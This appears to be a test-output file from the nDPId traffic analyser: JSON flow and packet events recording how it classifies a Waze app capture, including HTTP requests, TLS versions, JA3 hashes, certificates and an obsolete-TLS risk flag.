-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1435587871938,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871938,"pkt":"ABoRAAACABoRAAABCABFAAAodKpAABAG1JGwImdpCggAAQG7x2vs+m\/bEwWQJVAS\/\/\/FFgAA"} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871939,"flow_last_seen":1435587871939,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871939,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1435587871939,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871939,"pkt":"ABoRAAACABoRAAABCABFAAA8xDRAAEAGxZIKCAABNBFy25hiAbudWal8AAAAAKAC\/\/9IxgAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1435587871941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871941,"pkt":"ABoRAAACABoRAAABCABFAAAodKtAABAGRTA0EXLbCggAAQG7mGJiplaDnVmpfVAS\/\/9kvwAA"} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871941,"flow_last_seen":1435587871941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871941,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1435587871941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871941,"pkt":"ABoRAAACABoRAAABCABFAAA8RGdAAEAG0bkKCAABNubjrLHqAFALhykvAAAAAKAC\/\/\/PIgAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1435587871943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871943,"pkt":"ABoRAAACABoRAAABCABFAAAodKxAABAG0Yg25uOsCggAAQBQser0eNbQC4cpMFAS\/\/\/Y+wAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAocIpAAEAGqLEKCAABsCJnacdpAbv69x3CBQjiP1AQ\/\/\/FGQAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAoKgFAAEAG7zoKCAABsCJnacdqAbskTkdJ27G4uFAQ\/\/\/FGAAA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAo\/W1AAEAGG84KCAABsCJnacdrAbsTBZAl7Ppv3FAQ\/\/\/FFwAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAoxDVAAEAGxaUKCAABNBFy25hiAbudWal9YqZWhFAQ\/\/9kwAAA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAoRGhAAEAG0cwKCAABNubjrLHqAFALhykw9HjW0VAQ\/\/\/Y\/AAA"} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871918,"flow_last_seen":1435587872045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872045,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871929,"flow_last_seen":1435587872139,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872139,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871935,"flow_last_seen":1435587872205,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872205,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871939,"flow_last_seen":1435587872289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872289,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871941,"flow_last_seen":1435587872340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587872340,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871941,"flow_last_seen":1435587872341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1435587872341,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587872476,"flow_last_seen":1435587872476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587872476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1435587872476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587872476,"pkt":"ABoRAAACABoRAAABCABFAAA8WSJAAEAGvP4KCAABNubjrLHwAFDxQTSmAAAAAKAC\/\/\/drgAAAgQFtAQCCAoACG2EAAAAAAEDAwg="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1435587872477,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872477,"pkt":"ABoRAAACABoRAAABCABFAAAodLxAABAG0Xg25uOsCggAAQBQsfAOvstZ8UE0p1AS\/\/\/Y9QAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1435587872478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872478,"pkt":"ABoRAAACABoRAAABCABFAAAoWSNAAEAGvREKCAABNubjrLHwAFDxQTSnDr7LWlAQ\/\/\/Y9gAA"} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":175,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871935,"flow_last_seen":1435587872515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587872515,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871918,"flow_last_seen":1435587872568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587872568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -01253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871939,"flow_last_seen":1435587872569,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1435587872569,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587872702,"flow_last_seen":1435587872702,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587872702,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1435587872702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587872702,"pkt":"ABoRAAACABoRAAABCABFAAA8Y6lAAEAGsncKCAABNubjrLHyAFAC8Q4\/AAAAAKAC\/\/\/yUgAAAgQFtAQCCAoACG2WAAAAAAEDAwg="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1435587872704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872704,"pkt":"ABoRAAACABoRAAABCABFAAAodMpAABAG0Wo25uOsCggAAQBQsfL9DvHAAvEOQFAS\/\/\/Y8wAA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1435587872705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872705,"pkt":"ABoRAAACABoRAAABCABFAAAoY6pAAEAGsooKCAABNubjrLHyAFAC8Q5A\/Q7xwVAQ\/\/\/Y9AAA"} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":247,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871929,"flow_last_seen":1435587873486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587873486,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -01242{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":249,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871935,"flow_last_seen":1435587873688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1435587873688,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} -01242{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":251,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871929,"flow_last_seen":1435587873741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1435587873741,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} -01243{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":262,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587871918,"flow_last_seen":1435587874033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1435587874033,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} 